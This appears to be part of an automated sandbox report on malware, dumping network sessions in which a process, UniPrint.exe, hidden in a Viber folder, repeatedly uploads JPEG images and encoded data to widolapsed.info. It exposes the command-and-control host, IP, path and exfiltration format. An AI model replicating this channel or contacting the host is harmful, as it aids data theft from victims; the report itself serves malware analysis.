                                                                                                      2021-09-15 11:46:22 UTC1728INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      22192.168.2.34980945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:23 UTC1728OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76647
                                                                                                      Content-Type: multipart/form-data; boundary=--------776738021
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:23 UTC1728OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 37 36 37 33 38 30 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------776738021Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:23 UTC1728OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 91 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:23 UTC1728OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:23 UTC1744OUTData Raw: b2 45 35 e3 1a f7 fc 8c 1a 97 fd 7d 4b ff 00 a1 9a f6 65 35 e3 3a f7 fc 8c 1a 97 fd 7d 4b ff 00 a1 9a f4 32 cf 8a 47 2e 2f 64 50 a5 a4 a5 af 64 e2 0a 31 45 14 08 31 5e 9f f0 a7 8d 26 fb fe bb 8f fd 06 bc c2 bd 3b e1 57 fc 82 6f bf eb b8 ff 00 d0 6b 3a bf 09 a5 3f 88 ee a9 2b 26 c6 d6 07 d2 6d ae 6e 67 ba cb 40 b2 48 e6 ee 50 3e e8 24 fd ea b2 96 16 b2 46 af 1c d7 4c ac 32 08 bc 97 04 7f df 55 8b 8c 53 df f0 ff 00 82 68 a5 26 b6 fc 7f e0 15 35 48 2d 6e d2 ea d2 f6 09 24 8e 56 07 88 99 bf 85 46 41 03 af 15 e4 3a fe 97 fd 91 aa 3d a8 72 e9 8d c8 59 4a 9c 1f 50 7b d7 b2 4b 6c b6 b7 96 26 19 2e 3e 79 8a b0 7b 87 70 47 96 e7 a1 24 75 02 bc d7 e2 47 fc 8d 6f ff 00 5c 53 f9 55 c1 59 e9 d4 99 bb ad 7a 1c 9d 25 3b 02 93 15 b5 8c 84 a2 97 14 60 d0 01 de 8a 39 a2 80
                                                                                                      Data Ascii: E5}Ke5:}K2G./dPd1E1^&;Wok:?+&mng@HP>$FL2USh&5H-n$VFA:=rYJP{Kl&.>y{pG$uGo\SUYz%;`9
                                                                                                      2021-09-15 11:46:23 UTC1760OUTData Raw: a4 a2 8a d4 c4 5a 29 29 68 00 a2 8a 28 10 b4 52 52 d2 00 a2 8a 28 10 52 d2 52 d2 00 a5 a4 a5 14 08 51 4b 49 4b 48 42 d5 88 1b a0 aa d5 35 bf de a8 96 c6 94 9d a4 6b ea c7 1e 1a 1e ed 5c 4b f5 ae cf 59 e3 c3 49 fe f5 71 6e 79 ac 70 bf 03 f5 3d 4a ff 00 1a f4 3b d1 c7 87 6c be 82 a8 e6 ae b7 1e 1f b1 1f ec 8f e5 54 6b 9e 8f 5f 53 4c 43 f7 97 a0 b9 a3 34 94 95 b1 cf 71 d9 a5 0d 4d 14 51 60 4c 7e 4d 3b 71 f5 a6 0a 5a 96 8b 4d 92 06 34 e0 c6 a2 14 ec d4 b4 52 93 25 0e 7d 69 c2 66 1d 18 d4 20 d2 d4 b8 a2 d4 d9 69 6e 64 1f c4 6a 55 bc 71 d7 06 a9 03 4e cd 43 a7 13 45 56 45 f1 79 fd e5 06 97 cf 85 be f4 62 a8 66 94 31 a9 74 91 6a ab 2f 6d b4 7e a9 8a 4f b1 da 37 43 8a aa 18 d3 83 1a 9e 56 b6 65 29 c5 ee 89 4e 99 19 fb af 4c 6d 2d bf 85 c1 a0 39 ec 4d 48 26 71 fc
                                                                                                      Data Ascii: Z))h(RR(RRQKIKHB5k\KYIqnyp=J;lTk_SLC4qMQ`L~M;qZM4R%}if indjUqNCEVEybf1tj/m~O7CVe)NLm-9MH&q
                                                                                                      2021-09-15 11:46:23 UTC1776OUTData Raw: 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de ec 97
                                                                                                      Data Ascii: SnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*
                                                                                                      2021-09-15 11:46:23 UTC1792OUTData Raw: 30 16 8a 4a 28 01 69 29 68 a0 04 a2 8a 28 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5 61 d9 a4 cd 36 97
                                                                                                      Data Ascii: 0J(i)h((hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFifa6
                                                                                                      2021-09-15 11:46:23 UTC1803OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 37 36 37 33 38 30 32 31 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------776738021--
                                                                                                      2021-09-15 11:46:24 UTC1803INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:23 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=611eb500e3cd466317a7d1467f6c9f79b81c01c0b4da1e826c2a40a9d27d251e; expires=Thu, 15-Sep-2022 11:46:23 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:24 UTC1803INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      23192.168.2.34981045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:24 UTC1803OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76598
                                                                                                      Content-Type: multipart/form-data; boundary=--------1255899435
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:24 UTC1804OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 35 35 38 39 39 34 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1255899435Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:24 UTC1804OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e4 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:24 UTC1804OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:24 UTC1820OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:24 UTC1836OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:24 UTC1852OUTData Raw: 3c 46 e7 80 a4 fe 15 a2 75 2d 3e 3f f5 76 a4 fd 69 0e b8 17 fd 55 ac 63 eb 47 b4 a8 f6 88 7b 0a 6b 79 15 16 d2 76 e9 19 fc aa dd a6 9b 71 e6 86 28 7a d4 6d ae dd 1f ba 11 7e 82 98 9a ad e3 c8 b9 94 e0 9e c2 a6 4a b3 46 94 d5 08 c9 6e cb 9e 33 5d b0 da 83 e9 5c be 9f ff 00 21 1b 7f fa e8 b5 d3 78 c4 96 b6 b4 27 a9 5a e6 74 ff 00 f9 08 db ff 00 d7 41 fc e9 61 ff 00 80 75 d6 fe 31 e8 5a 8a 5b 99 83 4d 28 53 8e 95 48 cd a6 c7 d5 c9 aa de 24 24 5e ae 0f f0 d6 2f 5e f5 85 0a 1c d0 4d b2 71 38 ce 4a 8e 2a 27 40 75 3d 3d 3e e4 44 d3 0e b9 12 ff 00 ab b7 15 85 45 6e b0 b0 ea 72 3c 7d 5e 86 c3 6b f3 7f 04 6a 2a 07 d6 6e db a3 63 e9 59 d4 55 2c 3d 35 d0 c9 e2 eb 3e a5 b6 d4 2e 5f ef 4a df 9d 37 ce 91 ba b9 3f 8d 57 a7 2d 5f b3 8a d9 12 ab 4d ee c9 77 13 d4 9a 5c d3
                                                                                                      Data Ascii: <Fu->?viUcG{kyvq(zm~JFn3]\!x'ZtAau1Z[M(SH$$^/^Mq8J*'@u==>DEnr<}^kj*ncYU,=5>._J7?W-_Mw\
                                                                                                      2021-09-15 11:46:24 UTC1868OUTData Raw: 00 4a 28 a2 80 0a 28 a2 80 16 8a 4a 28 01 69 69 b4 b4 08 5a 4a 28 a0 05 cd 14 94 50 02 d1 49 45 00 2d 14 51 40 0b 45 25 2d 31 05 2d 25 14 c0 28 a2 8a 40 14 51 45 00 14 51 45 00 14 b4 94 50 02 d1 49 4b 4c 02 8a 28 a0 42 d1 49 45 00 2d 14 94 50 02 d1 49 45 00 2d 14 51 40 05 14 51 4c 42 d2 51 45 00 2d 14 51 40 05 14 51 40 05 14 51 40 0b 45 20 a5 a6 20 a5 a4 a3 34 00 b4 52 66 8a 00 5a 33 49 45 00 2e 68 a4 a5 a0 41 45 14 50 01 4b 49 4b 4c 02 96 92 8a 00 5e f4 51 45 00 14 52 52 d3 01 68 a4 a2 81 0b 45 25 2d 00 2d 14 94 53 10 b4 51 45 00 2d 25 19 a2 80 16 8a 28 a0 02 96 92 8a 00 5a 05 25 2d 31 0b 46 69 28 a6 21 73 46 69 28 a0 07 66 8a 6d 2d 17 0b 0b 46 69 33 49 9a 2e 16 1d 9a 33 4d cd 14 5c 2c 3f 34 66 9b 46 69 dc 56 1d 9a 4c d3 69 73 4a e3 b0 b9 a5 cd 36 93 34
                                                                                                      Data Ascii: J((J(iiZJ(PIE-Q@E%-1-%(@QEQEPIKL(BIE-PIE-Q@QLBQE-Q@Q@Q@E 4RfZ3IE.hAEPKIKL^QERRhE%--SQE-%(Z%-1Fi(!sFi(fm-Fi3I.3M\,?4fFiVLisJ64
                                                                                                      2021-09-15 11:46:24 UTC1878OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 35 35 38 39 39 34 33 35 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1255899435--
                                                                                                      2021-09-15 11:46:25 UTC1878INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:24 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=67d0baf06f69b1861a838cdf7628b63d647729694fc1eb6f12b3e2b0802f3ee9; expires=Thu, 15-Sep-2022 11:46:25 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:25 UTC1879INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      24192.168.2.34981145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:26 UTC1879OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76639
                                                                                                      Content-Type: multipart/form-data; boundary=--------3577760510
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:26 UTC1879OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 37 37 36 30 35 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3577760510Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:26 UTC1879OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 9b d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:26 UTC1879OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:26 UTC1895OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:26 UTC1911OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
